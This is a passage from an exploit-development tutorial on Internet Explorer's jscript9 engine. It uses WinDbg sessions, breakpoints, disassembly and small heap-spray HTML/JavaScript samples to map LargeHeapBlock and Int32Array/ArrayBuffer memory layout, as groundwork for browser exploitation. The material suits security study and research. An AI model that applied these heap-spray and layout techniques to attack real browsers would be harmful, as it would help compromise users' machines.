04dbc300 6e2db60c jscript9!ScriptEngine::ParseScriptText+0x5b
 
04dbc338 6e2d945d MSHTML!CActiveScriptHolder::ParseScriptText+0x42
 
Very interesting! A 
LargeHeapBlock
 is creat
ed by 
LargeAlloc
 (called by 
AllocZero
) when the first item of a 
JavascriptArray
 is assigned to. Let’s return from 
AddLargeHeapBlock
 by pressing 
Shift+F11
 and look at the 
memory pointed to by 
EAX
:
 
0:007> dd eax
 
25fcbe80  6f596e18 00000003 046b1000 00000002
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 320 
-
 
25fcbe90  00000000 00000000 00000004 046b1000
 
25fcbea0  046b3000 25fcbee0 00000000 00000000
 
25fcbeb0  00000000 00000000 04222e98 00000000
 
25fcbec0  00000000 00000000 00000000 00000004
 
25fcbed0  00000000 00000000 734a1523 8c000000
 
25fcbee0  6f596e18 0000000
3 046a6000 00000003
 
25fcbef0  00000002 00000000 00000004 046a8820
 
0:007> ln poi(eax)
 
(6f596e18)   jscript9!LargeHeapBlock::`vftable'   |  (6f596e3c)   jscript9!PageSegment::`vftable'
 
Exact matches:
 
    jscript9!LargeHeapBlock::`vftable' = <no type informat
ion>
 
So, 
EAX
 points to the 
LargeHeapBlock
 just created. Let’s see if this block was allocated directly on the 
heap:
 
0:007> !heap 
-
p 
-
a @eax
 
    address 25fcbe80 found in
 
    _HEAP @ 300000
 
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize 
-
 state
 
      
  25fcbe78 000c 0000  [00]   25fcbe80    00054 
-
 (busy)
 
          jscript9!LargeHeapBlock::`vftable'
 
Yes, it was! It’s size is 
0x54
 bytes and is preceded by an allocation header of 
8
 bytes (
UserPtr 
–
 
HEAP_ENTRY == 8
). That’s all we need to know.
 
We can put
 a breakpoint right after the call to 
AddLargeHeapBlock
:
 
bp jscript9!Recycler::LargeAlloc+0x66 ".printf 
\
"new LargeHeapBlock: addr = 0x%p
\
\
n
\
",eax;g"
 
We should have a look at a 
LargeHeapBlock
. First, let’s change the javascript code a bit so that fewer 
Lar
geHeapBlock
 are created:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x100
;
 
++
i
)
 
{
     
// <
------
 just 0x100
 
    
a
[
i
]
 
=
 
new
 
Array
(
0x1000
/
4
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 321 
-
 
    
a
[
i
][
0
]
 
=
 
0x7fffffff
;
 
    
a
[
i
][
1
]
 
=
 
-
2
;
 
    
a
[
i
][
2
]
 
=
 
1.2345
;
 
    
a
[
i
][
3
]
 
=
 
document.createElement
(
"div"
);
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Set the breakpoint we just saw:
 
bp jscript9!Recycler::LargeAlloc+0x66 ".printf 
\
"new LargeHeapBlock: addr = 0x%p
\
\
n
\
",eax;g"
 
Now reload the page in IE and close the first dialog box.
 
Your output should look similar to this:
 
new LargeHeapBlock: addr = 0x042a7368
 
new LargeHeapBlock: addr = 0x042a73c8
 
new LargeHeapBlock: addr = 0x042a7428
 
new LargeHeapBlock: addr = 0x042a7488
 
new L
argeHeapBlock: addr = 0x042a74e8
 
new LargeHeapBlock: addr = 0x042a7548
 
new LargeHeapBlock: addr = 0x042a75a8
 
new LargeHeapBlock: addr = 0x042a7608
 
new LargeHeapBlock: addr = 0x042a7668
 
new LargeHeapBlock: addr = 0x042a76c8
 
new LargeHeapBlock: addr = 0x042a
7728
 
new LargeHeapBlock: addr = 0x042a7788
 
new LargeHeapBlock: addr = 0x042a77e8
 
new LargeHeapBlock: addr = 0x042a7848
 
new LargeHeapBlock: addr = 0x042a78a8
 
new LargeHeapBlock: addr = 0x042a7908
 
new LargeHeapBlock: addr = 0x042a7968
 
new LargeHeapBlock: add
r = 0x042a79c8
 
new LargeHeapBlock: addr = 0x042a7a28
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 322 
-
 
new LargeHeapBlock: addr = 0x042a7a88
 
new LargeHeapBlock: addr = 0x042a7ae8
 
new LargeHeapBlock: addr = 0x042a7b48
 
new LargeHeapBlock: addr = 0x042a7ba8
 
new LargeHeapBlock: addr = 0x042a7c08
 
new LargeHeap
Block: addr = 0x042a7c68
 
new LargeHeapBlock: addr = 0x042a7cc8
 
new LargeHeapBlock: addr = 0x042a7d28
 
new LargeHeapBlock: addr = 0x042a7d88
 
new LargeHeapBlock: addr = 0x042a7de8
 
new LargeHeapBlock: addr = 0x042a7e48
 
new LargeHeapBlock: addr = 0x042a7ea8
 
new
 LargeHeapBlock: addr = 0x042a7f08
 
new LargeHeapBlock: addr = 0x042a7f68
 
new LargeHeapBlock: addr = 0x042a7fc8
 
new LargeHeapBlock: addr = 0x042a8028
 
new LargeHeapBlock: addr = 0x042a8088
 
new LargeHeapBlock: addr = 0x042a80e8
 
new LargeHeapBlock: addr = 0x13
4a9020
 
new LargeHeapBlock: addr = 0x134a9080
 
new LargeHeapBlock: addr = 0x134a90e0
 
new LargeHeapBlock: addr = 0x134a9140
 
new LargeHeapBlock: addr = 0x134a91a0
 
new LargeHeapBlock: addr = 0x134a9200
 
new LargeHeapBlock: addr = 0x134a9260
 
new LargeHeapBlock: a
ddr = 0x134a92c0
 
new LargeHeapBlock: addr = 0x134a9320
 
new LargeHeapBlock: addr = 0x134a9380
 
new LargeHeapBlock: addr = 0x134a93e0
 
new LargeHeapBlock: addr = 0x134a9440
 
new LargeHeapBlock: addr = 0x134a94a0
 
new LargeHeapBlock: addr = 0x134a9500
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 323 
-
 
new LargeHe
apBlock: addr = 0x134a9560
 
new LargeHeapBlock: addr = 0x134a95c0
 
new LargeHeapBlock: addr = 0x134a9620
 
new LargeHeapBlock: addr = 0x134a9680
 
new LargeHeapBlock: addr = 0x134a96e0
 
new LargeHeapBlock: addr = 0x134a9740
 
new LargeHeapBlock: addr = 0x134a97a0
 
n
ew LargeHeapBlock: addr = 0x134a9800
 
new LargeHeapBlock: addr = 0x134a9860
 
new LargeHeapBlock: addr = 0x134a98c0
 
new LargeHeapBlock: addr = 0x134a9920
 
new LargeHeapBlock: addr = 0x134a9980
 
new LargeHeapBlock: addr = 0x134a99e0
 
new LargeHeapBlock: addr = 0x
134a9a40
 
new LargeHeapBlock: addr = 0x134a9aa0
 
new LargeHeapBlock: addr = 0x134a9b00
 
new LargeHeapBlock: addr = 0x134a9b60
 
new LargeHeapBlock: addr = 0x134a9bc0
 
new LargeHeapBlock: addr = 0x134a9c20
 
new LargeHeapBlock: addr = 0x134a9c80
 
new LargeHeapBlock:
 addr = 0x134a9ce0
 
new LargeHeapBlock: addr = 0x134a9d40
 
new LargeHeapBlock: addr = 0x134a9da0
 
new LargeHeapBlock: addr = 0x134a9e00
 
new LargeHeapBlock: addr = 0x134a9e60
 
new LargeHeapBlock: addr = 0x134a9ec0
 
new LargeHeapBlock: addr = 0x134a9f20
 
new Large
HeapBlock: addr = 0x134a9f80
 
new LargeHeapBlock: addr = 0x1380e060
 
new LargeHeapBlock: addr = 0x1380e0c0
 
new LargeHeapBlock: addr = 0x1380e120
 
new LargeHeapBlock: addr = 0x1380e180
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 324 
-
 
new LargeHeapBlock: addr = 0x1380e1e0
 
new LargeHeapBlock: addr = 0x1380e240
 
new LargeHeapBlock: addr = 0x1380e2a0
 
new LargeHeapBlock: addr = 0x1380e300
 
new LargeHeapBlock: addr = 0x1380e360
 
new LargeHeapBlock: addr = 0x1380e3c0
 
new LargeHeapBlock: addr = 0x1380e420
 
new LargeHeapBlock: addr = 0x1380e480
 
new LargeHeapBlock: addr = 
0x1380e4e0
 
new LargeHeapBlock: addr = 0x1380e540
 
new LargeHeapBlock: addr = 0x1380e5a0
 
new LargeHeapBlock: addr = 0x1380e600
 
new LargeHeapBlock: addr = 0x1380e660
 
new LargeHeapBlock: addr = 0x1380e6c0
 
new LargeHeapBlock: addr = 0x1380e720
 
new LargeHeapBloc
k: addr = 0x1380e780
 
new LargeHeapBlock: addr = 0x1380e7e0
 
new LargeHeapBlock: addr = 0x1380e840
 
new LargeHeapBlock: addr = 0x1380e8a0
 
new LargeHeapBlock: addr = 0x1380e900
 
new LargeHeapBlock: addr = 0x1380e960
 
new LargeHeapBlock: addr = 0x1380e9c0
 
new Lar
geHeapBlock: addr = 0x1380ea20
 
new LargeHeapBlock: addr = 0x1380ea80
 
new LargeHeapBlock: addr = 0x1380eae0
 
new LargeHeapBlock: addr = 0x1380eb40
 
new LargeHeapBlock: addr = 0x1380eba0
 
new LargeHeapBlock: addr = 0x1380ec00
 
new LargeHeapBlock: addr = 0x1380ec
60
 
new LargeHeapBlock: addr = 0x1380ecc0
 
new LargeHeapBlock: addr = 0x1380ed20
 
new LargeHeapBlock: addr = 0x1380ed80
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 325 
-
 
new LargeHeapBlock: addr = 0x1380ede0
 
new LargeHeapBlock: addr = 0x1380ee40
 
new LargeHeapBlock: addr = 0x1380eea0
 
new LargeHeapBlock: addr 
= 0x1380ef00
 
new LargeHeapBlock: addr = 0x1380ef60
 
new LargeHeapBlock: addr = 0x1380efc0
 
new LargeHeapBlock: addr = 0x16ccb020
 
new LargeHeapBlock: addr = 0x16ccb080
 
new LargeHeapBlock: addr = 0x16ccb0e0
 
new LargeHeapBlock: addr = 0x16ccb140
 
new LargeHeapBl
ock: addr = 0x16ccb1a0
 
new LargeHeapBlock: addr = 0x16ccb200
 
new LargeHeapBlock: addr = 0x16ccb260
 
new LargeHeapBlock: addr = 0x16ccb2c0
 
new LargeHeapBlock: addr = 0x16ccb320
 
new LargeHeapBlock: addr = 0x16ccb380
 
new LargeHeapBlock: addr = 0x16ccb3e0
 
new L
argeHeapBlock: addr = 0x16ccb440
 
new LargeHeapBlock: addr = 0x16ccb4a0
 
new LargeHeapBlock: addr = 0x16ccb500
 
new LargeHeapBlock: addr = 0x16ccb560
 
new LargeHeapBlock: addr = 0x16ccb5c0
 
new LargeHeapBlock: addr = 0x16ccb620
 
new LargeHeapBlock: addr = 0x16cc
b680
 
new LargeHeapBlock: addr = 0x16ccb6e0
 
new LargeHeapBlock: addr = 0x16ccb740
 
new LargeHeapBlock: addr = 0x16ccb7a0
 
new LargeHeapBlock: addr = 0x16ccb800
 
new LargeHeapBlock: addr = 0x16ccb860
 
new LargeHeapBlock: addr = 0x16ccb8c0
 
new LargeHeapBlock: add
r = 0x16ccb920
 
new LargeHeapBlock: addr = 0x16ccb980
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 326 
-
 
new LargeHeapBlock: addr = 0x16ccb9e0
 
new LargeHeapBlock: addr = 0x16ccba40
 
new LargeHeapBlock: addr = 0x16ccbaa0
 
new LargeHeapBlock: addr = 0x16ccbb00
 
new LargeHeapBlock: addr = 0x16ccbb60
 
new LargeHeap
Block: addr = 0x16ccbbc0
 
new LargeHeapBlock: addr = 0x16ccbc20
 
new LargeHeapBlock: addr = 0x16ccbc80
 
new LargeHeapBlock: addr = 0x16ccbce0
 
new LargeHeapBlock: addr = 0x16ccbd40
 
new LargeHeapBlock: addr = 0x16ccbda0
 
new LargeHeapBlock: addr = 0x16ccbe00
 
new
 LargeHeapBlock: addr = 0x16ccbe60
 
new LargeHeapBlock: addr = 0x16ccbec0
 
new LargeHeapBlock: addr = 0x16ccbf20
 
new LargeHeapBlock: addr = 0x16ccbf80
 
new LargeHeapBlock: addr = 0x16ccc020
 
new LargeHeapBlock: addr = 0x16ccc080
 
new LargeHeapBlock: addr = 0x16
ccc0e0
 
new LargeHeapBlock: addr = 0x16ccc140
 
new LargeHeapBlock: addr = 0x16ccc1a0
 
new LargeHeapBlock: addr = 0x16ccc200
 
new LargeHeapBlock: addr = 0x16ccc260
 
new LargeHeapBlock: addr = 0x16ccc2c0
 
new LargeHeapBlock: addr = 0x16ccc320
 
new LargeHeapBlock: a
ddr = 0x16ccc380
 
new LargeHeapBlock: addr = 0x16ccc3e0
 
new LargeHeapBlock: addr = 0x16ccc440
 
new LargeHeapBlock: addr = 0x16ccc4a0
 
new LargeHeapBlock: addr = 0x16ccc500
 
new LargeHeapBlock: addr = 0x16ccc560
 
new LargeHeapBlock: addr = 0x16ccc5c0
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 327 
-
 
new LargeHe
apBlock: addr = 0x16ccc620
 
new LargeHeapBlock: addr = 0x16ccc680
 
new LargeHeapBlock: addr = 0x16ccc6e0
 
new LargeHeapBlock: addr = 0x16ccc740
 
new LargeHeapBlock: addr = 0x16ccc7a0
 
new LargeHeapBlock: addr = 0x16ccc800
 
new LargeHeapBlock: addr = 0x16ccc860
 
n
ew LargeHeapBlock: addr = 0x16ccc8c0
 
new LargeHeapBlock: addr = 0x16ccc920
 
new LargeHeapBlock: addr = 0x16ccc980
 
new LargeHeapBlock: addr = 0x16ccc9e0
 
new LargeHeapBlock: addr = 0x16ccca40
 
new LargeHeapBlock: addr = 0x16cccaa0
 
new LargeHeapBlock: addr = 0x
16cccb00
 
new LargeHeapBlock: addr = 0x16cccb60
 
new LargeHeapBlock: addr = 0x16cccbc0
 
new LargeHeapBlock: addr = 0x16cccc20
 
new LargeHeapBlock: addr = 0x16cccc80
 
new LargeHeapBlock: addr = 0x16cccce0
 
new LargeHeapBlock: addr = 0x16cccd40
 
new LargeHeapBlock:
 addr = 0x16cccda0
 
new LargeHeapBlock: addr = 0x16ccce00
 
new LargeHeapBlock: addr = 0x16ccce60
 
new LargeHeapBlock: addr = 0x16cccec0
 
new LargeHeapBlock: addr = 0x16cccf20
 
new LargeHeapBlock: addr = 0x16cccf80
 
new LargeHeapBlock: addr = 0x1364e060
 
new Large
HeapBlock: addr = 0x1364e0c0
 
new LargeHeapBlock: addr = 0x1364e120
 
new LargeHeapBlock: addr = 0x1364e180
 
new LargeHeapBlock: addr = 0x1364e1e0
 
new LargeHeapBlock: addr = 0x1364e240
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 328
 
-
 
new LargeHeapBlock: addr = 0x1364e2a0
 
new LargeHeapBlock: addr = 0x1364e300
 
new LargeHeapBlock: addr = 0x1364e360
 
new LargeHeapBlock: addr = 0x1364e3c0
 
new LargeHeapBlock: addr = 0x1364e420
 
new LargeHeapBlock: addr = 0x1364e480
 
new LargeHeapBlock: addr = 0x1364e4e0
 
new LargeHeapBlock: addr = 0x1364e540
 
new LargeHeapBlock: addr = 
0x1364e5a0
 
new LargeHeapBlock: addr = 0x1364e600
 
new LargeHeapBlock: addr = 0x1364e660
 
new LargeHeapBlock: addr = 0x1364e6c0
 
new LargeHeapBlock: addr = 0x1364e720
 
new LargeHeapBlock: addr = 0x1364e780
 
new LargeHeapBlock: addr = 0x1364e7e0
 
new LargeHeapBloc
k: addr = 0x1364e840
 
new LargeHeapBlock: addr = 0x1364e8a0
 
new LargeHeapBlock: addr = 0x1364e900
 
new LargeHeapBlock: addr = 0x1364e960
 
new LargeHeapBlock: addr = 0x1364e9c0
 
new LargeHeapBlock: addr = 0x1364ea20
 
new LargeHeapBlock: addr = 0x1364ea80
 
new Lar
geHeapBlock: addr = 0x1364eae0
 
new LargeHeapBlock: addr = 0x1364eb40
 
new LargeHeapBlock: addr = 0x1364eba0
 
new LargeHeapBlock: addr = 0x1364ec00
 
new LargeHeapBlock: addr = 0x1364ec60
 
new LargeHeapBlock: addr = 0x1364ecc0
 
new LargeHeapBlock: addr = 0x1364ed
20
 
new LargeHeapBlock: addr = 0x1364ed80
 
new LargeHeapBlock: addr = 0x1364ede0
 
new LargeHeapBlock: addr = 0x1364ee40
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 329 
-
 
new LargeHeapBlock: addr = 0x1364eea0
 
new LargeHeapBlock: addr = 0x1364ef00
 
new LargeHeapBlock: addr = 0x1364ef60
 
new LargeHeapBlock: addr 
= 0x1364efc0
 
new LargeHeapBlock: addr = 0x1364f060
 
new LargeHeapBlock: addr = 0x1364f0c0
 
new LargeHeapBlock: addr = 0x1364f120
 
new LargeHeapBlock: addr = 0x1364f180
 
new LargeHeapBlock: addr = 0x1364f1e0
 
new LargeHeapBlock: addr = 0x1364f240
 
new LargeHeapBl
ock: addr = 0x1364f2a0
 
new LargeHeapBlock: addr = 0x1364f300
 
new LargeHeapBlock: addr = 0x1364f360
 
new LargeHeapBlock: addr = 0x1364f3c0
 
Let’s look at the last 6 addresses:
 
new LargeHeapBlock: addr = 0x1364f1e0
 
new LargeHeapBlock: addr = 0x1364f240
 
new Lar
geHeapBlock: addr = 0x1364f2a0
 
new LargeHeapBlock: addr = 0x1364f300
 
new LargeHeapBlock: addr = 0x1364f360
 
new LargeHeapBlock: addr = 0x1364f3c0
 
First of all, note that they’re 
0x60
 bytes apart: 
0x8
 bytes for the allocation header and 
0x58
 bytes for the 
La
rgeHeapBlock
 object. Here are the last 6 
LargeHeapBlocks
 in memory:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 330 
-
 
 
As we can see, each 
LargeHeapBlock
 contains, af offset 
0x24
, a
 pointer to the previous 
LargeHeapBlock
. 
This pointer will be used later to determine the address of the 
LeageHeapBlock
 itself.
 
ArrayBuffer & Int32Array
 
Here’s what the 
MDN
 (
M
ozilla 
D
eveloper 
N
etwork) says about 
ArrayBuffer
:
 
The 
ArrayBuffer
 object is used 
to represent a generic, fixed
-
length raw binary data buffer. You can 
not directly manipulate the contents of an 
ArrayBuffer
; instead, you create one of the typed array 
objects or a 
DataView
 object which represents the buffer in a specific format, and use t
hat to read 
and write the contents of the buffer.
 
Consider the following example:
 
JavaScript
 
 
// This creates an ArrayBuffer manually.
 
buf
 
=
 
new
 
ArrayBuffer
(
400
*
1024
*
1024
);
 
a
 
=
 
new
 
Int32Array
(
buf
);
 
 
// This creates an ArrayBuffer automatically.
 
a2
 
=
 
new
 
I
nt32Array
(
100
*
1024
*
1024
);
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 331 
-
 
The arrays 
a
 and 
a2
 are equivalent and have the same length. When creating an 
ArrayBuffer
 directly we 
need to specify the size in bytes, whereas when creating an 
Int32Array
 we need to specify the length in 
number of elements (32
-
bit integers). Note that when we create an 
Int32Array
, an 
ArrayBuffer
 is created 
internally and the 
Int32Array
 uses it.
 
To find out what code creates an 
ArrayBuffer
, we can perform a heap spray like before. Let’s use the 
following javascript code:
 
XHTML
 
 
<
html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x10000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Int32Array
(
0x1000
/
4
);
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
0x123
;
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
When the dialog box with the text 
Done
 pops up, we can look at the memory with VMMap. Here’s what we 
see:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 332 
-
 
 
Note that this time it says 
Heap (Private D ...
, which means that the 
ArrayBuffers
 are allocated directly on 
the heap. If we look at the address 
f650000
 in WinDbg, we see this:
 
0f650000: 03964205 0101f3c5 ffeeffee 00000000 10620010 0e680010 00450000 
0f650000
 
0f650020: 00000fd0 0f650040 10620000 0000000f 00000001 00000000 10610ff0 10610ff0
 
0f650040: 839ec20d 0801f3cd 0a73f528 0c6dcc48 00000012 f0e0d0c0 39682cf0 88000000
 
0f650060: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
0
f650080: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
0f6500a0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 333 
-
 
0f6500c0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
0f6500e0: 0
0000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
Our data begins at 
f650060
. Since it’s on the heap, let’s use 
!heap
:
 
0:012> !heap 
-
p 
-
a f650060
 
    address 0f650060 found in
 
    _HEAP @ 450000
 
      HEAP_ENTRY Size Prev Flags    User
Ptr UserSize 
-
 state
 
        0f650058 0201 0000  [00]   0f650060    01000 
-
 (busy)
 
As always, there are 
8
 bytes of allocation header. If we reload the page in IE and go back to WinDbg, we 
can see that the situation hasn’t changed:
 
0f650000: 03964205 0101f3
c5 ffeeffee 00000000 10620010 0e680010 00450000 0f650000
 
0f650020: 00000fd0 0f650040 10620000 000000cc 00000004 00000000 10310ff0 10610ff0
 
0f650040: 839ec20d 0801f3cd 129e0158 11119048 00000012 f0e0d0c0 2185d880 88000000
 
0f650060: 00000123 00000123 0000012
3 00000123 00000123 00000123 00000123 00000123
 
0f650080: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
0f6500a0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
0f6500c0: 00000123 00000123 00000123 00000123
 00000123 00000123 00000123 00000123
 
0f6500e0: 00000123 00000123 00000123 00000123 00000123 00000123 00000123 00000123
 
This means that we could put a hardware breakpoint at the address 
0f650058
 (
HEAP_ENTRY
 above) and 
break on the code which make the alloca
tion on the heap. Reload the page in IE and set the breakpoint in 
WinDbg:
 
0:013> ba w4 f650058
 
After closing the dialog box in IE, we break here:
 
772179ff 331da4002e77    xor     ebx,dword ptr [ntdll!RtlpLFHKey (772e00a4)]
 
77217a05 c6410780        mov     
byte ptr [ecx+7],80h
 
77217a09 33d8            xor     ebx,eax
 
77217a0b 33de            xor     ebx,esi
 
77217a0d ff4df4          dec     dword ptr [ebp
-
0Ch]
 
77217a10 8919            mov     dword ptr [ecx],ebx
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 334 
-
 
77217a12 c60200          mov     byte ptr [edx]
,0           ds:002b:0f65005e=00  <
-----------
 we are here
 
77217a15 75be            jne     ntdll!RtlpSubSegmentInitialize+0xe5 (772179d5)
 
77217a17 8b5d08          mov     ebx,dword ptr [ebp+8]
 
77217a1a 8b45f8          mov     eax,dword ptr [ebp
-
8]
 
77217a1
d baffff0000      mov     edx,0FFFFh
 
77217a22 66895108        mov     word ptr [ecx+8],dx
 
77217a26 668b4df0        mov     cx,word ptr [ebp
-
10h]
 
77217a2a 66894e10        mov     word ptr [esi+10h],cx
 
Here’s the stack trace:
 
0:004> k 10
 
ChildEBP RetAddr  
 
0
57db90c 77216e87 ntdll!RtlpSubSegmentInitialize+0x122
 
057db9a8 7720e0f2 ntdll!RtlpLowFragHeapAllocFromContext+0x882
 
057dba1c 75de9d45 ntdll!RtlAllocateHeap+0x206
 
057dba3c 6f7f4613 msvcrt!malloc+0x8d
 
057dba4c 6f643cfa jscript9!memset+0x3a4c2
 
057dba64 6f79fc
00 jscript9!Js::JavascriptArrayBuffer::Create+0x3c   <
----------------
 
057dba90 6f79af10 jscript9!Js::TypedArrayBase::CreateNewInstance+0x1cf   <
----------------
 
057dbb08 6f5c7461 jscript9!Js::TypedArray<int>::NewInstance+0x55   <
----------------
 
057dbca4 
6f5a5cf5 jscript9!Js::InterpreterStackFrame::Process+0x4b47
 
057dbdd4 04a70fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x305
 
WARNING: Frame IP not in any known module. Following frames may be wrong.
 
057dbde0 6f5a1f60 0x4a70fe9
 
057dbe60 6f5a2
0ca jscript9!Js::JavascriptFunction::CallRootFunction+0x140
 
057dbe78 6f5a209f jscript9!Js::JavascriptFunction::CallRootFunction+0x19
 
057dbec0 6f5a2027 jscript9!ScriptSite::CallRootFunction+0x40
 
057dbee8 6f64df75 jscript9!ScriptSite::Execute+0x61
 
057dbf74 6
f64db57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9
 
Perfect! We see that the 
ArrayBuffer
 is allocated with a C’s 
malloc
, which is called inside 
jscript9!Js::JavascriptArrayBuffer::Create
. 
TypedArray<int>
 is probably our 
Int32Array
 and 
TypedArrayBase
 
is its base class. So,
 jscript9!Js::TypedArray<int>::NewInstance
 creates a new 
Int32Array
 and a new 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 335 
-
 
JavascriptArrayBuffer
. Now we should have a look at an 
Int32Array
 in memory. We don’t need to spray the 
heap anymore, so let’s change the code:
 
XHTML
 
 
<htm
l>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
a
 
=
 
new
 
Int32Array
(
0x1000
);
 
  
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
a.length
;
 
++
j
)
 
    
a
[
j
]
 
=
 
0x123
;
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Let’s put a breakpoint on the creation of a new 
Int32
Array
:
 
0:013> bp jscript9!Js::TypedArray<int>::NewInstance
 
Couldn't resolve error at 'jscript9!Js::TypedArray<int>::NewInstance'
 
The breakpoint expression "jscript9!Js::TypedArray<int>::NewInstance" evaluates to the inline function.
 
Please use bm command t
o set breakpoints instead of bp.
 
Let’s try to use 
bm
 instead:
 
0:013> bm jscript9!Js::TypedArray<int>::NewInstance
 
  
1: 6f79aebb          @!"jscript9!Js::TypedArray<int>::NewInstance"
 
0:013> bl
 
 1 e 6f79aebb     0001 (0001)  0:**** jscript9!Js::TypedArray<i
nt>::NewInstance
 
OK, it seems it worked. Now reload the page in IE. When we close the dialog box, we break on 
jscript9!Js::TypedArray<int>::NewInstance
. Here’s the entire function:
 
0:004> uf 6f79aebb
 
jscript9!Js::TypedArray<int>::NewInstance:
 
6f79aebb 8bff
            mov     edi,edi
 
6f79aebd 55              push    ebp
 
6f79aebe 8bec            mov     ebp,esp
 
6f79aec0 83e4f8          and     esp,0FFFFFFF8h
 
6f79aec3 83ec0c          sub     esp,0Ch
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 336 
-
 
6f79aec6 53              push    ebx
 
6f79aec7 8b5d08         
 mov     ebx,dword ptr [ebp+8]
 
6f79aeca 8b4304          mov     eax,dword ptr [ebx+4]
 
6f79aecd 8b4004          mov     eax,dword ptr [eax+4]
 
6f79aed0 8b4804          mov     ecx,dword ptr [eax+4]
 
6f79aed3 56              push    esi
 
6f79aed4 57            
  push    edi
 
6f79aed5 6a00            push    0
 
6f79aed7 51              push    ecx
 
6f79aed8 8b8934020000    mov     ecx,dword ptr [ecx+234h]
 
6f79aede ba00040000      mov     edx,400h
 
6f79aee3 e8b2e7e0ff      call    jscript9!ThreadContext::ProbeStack (6
f5a969a)
 
6f79aee8 8d4510          lea     eax,[ebp+10h]
 
6f79aeeb 50              push    eax
 
6f79aeec 8d7d0c          lea     edi,[ebp+0Ch]
 
6f79aeef 8d742414        lea     esi,[esp+14h]
 
6f79aef3 e8cb93e0ff      call    jscript9!Js::ArgumentReader::Argumen
tReader (6f5a42c3)
 
6f79aef8 8b4304          mov     eax,dword ptr [ebx+4]
 
6f79aefb 8b4004          mov     eax,dword ptr [eax+4]
 
6f79aefe 6850bd726f      push    offset jscript9!Js::TypedArray<int>::Create (6f72bd50)
 
6f79af03 6a04            push    4
 
6f79
af05 ff7004          push    dword ptr [eax+4]
 
6f79af08 8bc6            mov     eax,esi
 
6f79af0a 50              push    eax
 
6f79af0b e8214b0000      call    jscript9!Js::TypedArrayBase::CreateNewInstance (6f79fa31)
 
6f79af10 5f              pop     edi
 
6f7
9af11 5e              pop     esi
 
6f79af12 5b              pop     ebx
 
6f79af13 8be5            mov     esp,ebp
 
6f79af15 5d              pop     ebp
 
6f79af16 c3              ret
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 337 
-
 
By stepping inside 
jscript9!Js::TypedArrayBase::CreateNewInstance
 we come acro
ss a call to 
jscript9!Js::TypedArray<int>::Create
:
 
6f79fc16 ffb608060000    push    dword ptr [esi+608h]
 
6f79fc1c 57              push    edi
 
6f79fc1d 51              push    ecx
 
6f79fc1e 53              push    ebx
 
6f79fc1f ff5514          call    dword p
tr [ebp+14h]  ss:002b:057dba9c={jscript9!Js::TypedArray<int>::Create (6f72bd50)}
 
If we step inside 
jscript9!Js::TypedArray<int>::Create
, we get to a call to 
Alloc
:
 
6f72bd88 8b7514          mov     esi,dword ptr [ebp+14h] ss:002b:057dba64=04b6b000
 
6f72bd8b 
8b4e0c          mov     ecx,dword ptr [esi+0Ch]
 
6f72bd8e 6a24            push    24h      <
-----------------
 24h bytes
 
6f72bd90 e893b2e6ff      call    jscript9!Recycler::Alloc (6f597028)
 
6f72bd95 ffb61c010000    push    dword ptr [esi+11Ch]
 
